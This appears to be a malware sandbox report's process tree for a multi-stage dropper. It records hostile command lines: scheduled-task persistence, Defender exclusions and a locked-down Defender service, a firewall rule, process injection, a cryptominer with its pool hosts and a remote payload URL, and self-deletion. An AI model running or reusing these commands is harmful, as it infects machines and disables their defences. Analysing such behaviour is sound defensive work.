The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:96
- C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5096
- - C:\Windows\SysWOW64\SubDir\asg.exe
    "C:\Windows\SysWOW64\SubDir\asg.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4936
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\asg.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:3876
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:4884
- C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4224
- - C:\Users\Admin\AppData\Local\Temp\is-1K0I5.tmp\tuc5.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-1K0I5.tmp\tuc5.tmp" /SL5="$B0060,4472331,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    PID:168
- C:\Users\Admin\AppData\Local\Temp\Files\brg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\brg.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:508
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4372
- C:\Users\Admin\AppData\Local\Temp\Files\VLTKBacdau.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\VLTKBacdau.exe"
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:1604
- C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:400
- - C:\Users\Admin\AppData\Local\Temp\is-KLKRL.tmp\tuc6.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-KLKRL.tmp\tuc6.tmp" /SL5="$500CE,4469780,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    PID:4500
- C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2176
- C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4304
- C:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exe
  C:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2544
- C:\Users\Admin\AppData\Local\Temp\Files\DefenderControl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\DefenderControl.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:832
- C:\Users\Admin\AppData\Local\Temp\Files\alex.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\alex.exe"
  2⤵
  PID:3608
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
    3⤵
    - Executes dropped EXE
    PID:2400
- C:\Users\Admin\AppData\Local\Temp\Files\CoercedPotato.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\CoercedPotato.exe"
  2⤵
  PID:200
- C:\Users\Admin\AppData\Local\Temp\Files\456.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\456.exe"
  2⤵
  PID:1516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\456.exe" -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4556
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    3⤵
    - Drops startup file
    - Suspicious use of AdjustPrivilegeToken
    PID:1472
  - - C:\Users\Admin\Pictures\3Nh3iUB0ixXPS46jElx130zZ.exe
      "C:\Users\Admin\Pictures\3Nh3iUB0ixXPS46jElx130zZ.exe"
      4⤵
      Executes dropped EXE
      PID:524
  - - C:\Users\Admin\Pictures\TNfnHRHCUJXtDWynapeSxFlf.exe
      "C:\Users\Admin\Pictures\TNfnHRHCUJXtDWynapeSxFlf.exe"
      4⤵
      PID:3632
  - - C:\Users\Admin\Pictures\tWRDOwBPjdPxOfJwvJzJ05pQ.exe
      "C:\Users\Admin\Pictures\tWRDOwBPjdPxOfJwvJzJ05pQ.exe"
      4⤵
      PID:2924
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 392
        5⤵
        Program crash
        
        PID:4436
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 376
        5⤵
        Program crash
        
        PID:4404
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 408
        5⤵
        Program crash
        
        PID:4132
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 716
        5⤵
        Program crash
        
        PID:2264
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 732
        5⤵
        Program crash
        
        PID:2352
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 832
        5⤵
        Program crash
        
        PID:4976
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 732
        5⤵
        Program crash
        
        PID:1320
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 796
        5⤵
        Program crash
        
        PID:3996
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 840
        5⤵
        Program crash
        
        PID:220
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 608
        5⤵
        Program crash
        
        PID:1796
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 828
        5⤵
        Program crash
        
        PID:2808
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 836
        5⤵
        Program crash
        
        PID:424
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:1444
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 832
        5⤵
        Program crash
        
        PID:4284
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 608
        5⤵
        Program crash
        
        PID:2384
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 564
        5⤵
        Program crash
        
        PID:3652
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 720
        5⤵
        Program crash
        
        PID:4700
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 676
        5⤵
        Program crash
        
        PID:1272
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 228
        5⤵
        Program crash
        
        PID:3480
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 648
        5⤵
        Program crash
        
        PID:2324
    - - C:\Users\Admin\Pictures\tWRDOwBPjdPxOfJwvJzJ05pQ.exe
        
        "C:\Users\Admin\Pictures\tWRDOwBPjdPxOfJwvJzJ05pQ.exe"
        5⤵
        
        PID:2232
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 328
        6⤵
        Program crash
        
        PID:3024
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 628
        6⤵
        Program crash
        
        PID:4668
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 708
        6⤵
        Program crash
        
        PID:1384
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 792
        6⤵
        Program crash
        
        PID:2336
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4728
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 692
        6⤵
        Program crash
        
        PID:3368
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 664
        6⤵
        Program crash
        
        PID:2748
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 584
        6⤵
        Program crash
        
        PID:1172
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 396
        6⤵
        Program crash
        
        PID:4040
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 348
        6⤵
        Program crash
        
        PID:4160
      - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:1840
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:2336
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:3692
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        6⤵
        
        PID:2844
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 392
        7⤵
        Program crash
        
        PID:1512
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 472
        7⤵
        Program crash
        
        PID:4520
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 636
        7⤵
        Program crash
        
        PID:4432
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 680
        7⤵
        Program crash
        
        PID:1756
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 716
        7⤵
        Program crash
        
        PID:740
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 612
        7⤵
        Program crash
        
        PID:2376
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 412
        7⤵
        Program crash
        
        PID:3004
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 728
        7⤵
        Program crash
        
        PID:4568
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 384
        7⤵
        Program crash
        
        PID:2500
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 848
        7⤵
        Program crash
        
        PID:2284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:4108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:1068
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        7⤵
        
        PID:2848
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:4736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:200
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 880
        7⤵
        Program crash
        
        PID:1904
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 876
        7⤵
        Program crash
        
        PID:4788
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 868
        7⤵
        Program crash
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        7⤵
        
        PID:3368
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 676
        7⤵
        Program crash
        
        PID:4528
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 988
        7⤵
        Program crash
        
        PID:4040
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:1908
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        7⤵
        
        PID:612
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1012
        7⤵
        Program crash
        
        PID:1296
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1028
        7⤵
        
        PID:1880
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 728
        7⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1112
        7⤵
        
        PID:4424
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1124
        7⤵
        
        PID:3456
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1000
        7⤵
        
        PID:380
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1076
        7⤵
        
        PID:4520
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1168
        7⤵
        
        PID:3168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:4392
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:5480
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 992
        7⤵
        
        PID:4616
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 968
        7⤵
        
        PID:5496
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
        7⤵
        
        PID:5632
        
        C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id ac2c5766-c63c-4000-9d7d-ede88b4ebb27 --tls --nicehash -o showlock.net:443 --rig-id ac2c5766-c63c-4000-9d7d-ede88b4ebb27 --tls --nicehash -o showlock.net:80 --rig-id ac2c5766-c63c-4000-9d7d-ede88b4ebb27 --nicehash --http-port 3433 --http-access-token ac2c5766-c63c-4000-9d7d-ede88b4ebb27 --randomx-wrmsr=-1
        8⤵
        
        PID:5552
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe -hide 5552
        8⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 348
        9⤵
        
        PID:5624
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 384
        9⤵
        
        PID:4016
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 460
        9⤵
        
        PID:5184
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 604
        9⤵
        
        PID:1360
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 572
        9⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 676
        9⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 604
        9⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 688
        9⤵
        
        PID:5208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1280
        7⤵
        
        PID:3168
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1380
        7⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1316
        7⤵
        
        PID:1172
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1360
        7⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1412
        7⤵
        
        PID:4788
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        
        PID:4216
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:4608
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:5088
  - - C:\Users\Admin\Pictures\K9LUequqNCUJChLdY7ffYqtv.exe
      "C:\Users\Admin\Pictures\K9LUequqNCUJChLdY7ffYqtv.exe"
      4⤵
      PID:1936
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 432
        5⤵
        Program crash
        
        PID:1352
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 652
        5⤵
        Program crash
        
        PID:1744
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 788
        5⤵
        Program crash
        
        PID:1880
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 636
        5⤵
        Program crash
        
        PID:3376
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4392
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 652
        5⤵
        Program crash
        
        PID:2020
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 712
        5⤵
        Program crash
        
        PID:1952
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 648
        5⤵
        Program crash
        
        PID:1172
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 416
        5⤵
        Program crash
        
        PID:4716
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 384
        5⤵
        Program crash
        
        PID:3692
    - - C:\Users\Admin\Pictures\K9LUequqNCUJChLdY7ffYqtv.exe
        
        "C:\Users\Admin\Pictures\K9LUequqNCUJChLdY7ffYqtv.exe"
        5⤵
        
        PID:3620
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 324
        6⤵
        Program crash
        
        PID:2244
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 632
        6⤵
        Program crash
        
        PID:1296
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 676
        6⤵
        Program crash
        
        PID:4976
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 772
        6⤵
        Program crash
        
        PID:1012
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4256
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 560
        6⤵
        Program crash
        
        PID:4792
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 652
        6⤵
        Program crash
        
        PID:4436
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 592
        6⤵
        Program crash
        
        PID:1748
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 368
        6⤵
        Program crash
        
        PID:4896
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 348
        6⤵
        Program crash
        
        PID:8
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:2148
      - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:3344
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5084
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        Launches sc.exe
        
        PID:1108
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 844
        6⤵
        Program crash
        
        PID:4404
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 580
        6⤵
        Program crash
        
        PID:1560
  - - C:\Users\Admin\Pictures\ofO0kq3KHSooXJGY7KSuEiLf.exe
      "C:\Users\Admin\Pictures\ofO0kq3KHSooXJGY7KSuEiLf.exe"
      4⤵
      PID:912
    - - C:\Users\Admin\AppData\Local\Temp\is-GEQU1.tmp\ofO0kq3KHSooXJGY7KSuEiLf.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GEQU1.tmp\ofO0kq3KHSooXJGY7KSuEiLf.tmp" /SL5="$30348,140559,56832,C:\Users\Admin\Pictures\ofO0kq3KHSooXJGY7KSuEiLf.exe"
        5⤵
        
        PID:1956
      - C:\Users\Admin\AppData\Local\Temp\is-9SJKF.tmp\444567.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-9SJKF.tmp\444567.exe" /S /UID=lylal220
        6⤵
        
        PID:4728
        
        C:\Program Files (x86)\Reference Assemblies\XVHNWITGAR\lightcleaner.exe
        
        "C:\Program Files (x86)\Reference Assemblies\XVHNWITGAR\lightcleaner.exe" /VERYSILENT
        7⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\is-SFM0N.tmp\lightcleaner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-SFM0N.tmp\lightcleaner.tmp" /SL5="$603E0,833775,56832,C:\Program Files (x86)\Reference Assemblies\XVHNWITGAR\lightcleaner.exe" /VERYSILENT
        8⤵
        
        PID:1560
  - - C:\Users\Admin\Pictures\17aV29QH6Rmgn47hVNowHB5G.exe
      "C:\Users\Admin\Pictures\17aV29QH6Rmgn47hVNowHB5G.exe"
      4⤵
      PID:2268
    - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
        
        C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
        5⤵
        
        PID:1092
    - - C:\Users\Admin\AppData\Local\Temp\nsmF872.tmp
        
        C:\Users\Admin\AppData\Local\Temp\nsmF872.tmp
        5⤵
        
        PID:3464
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsmF872.tmp" & del "C:\ProgramData\*.dll"" & exit
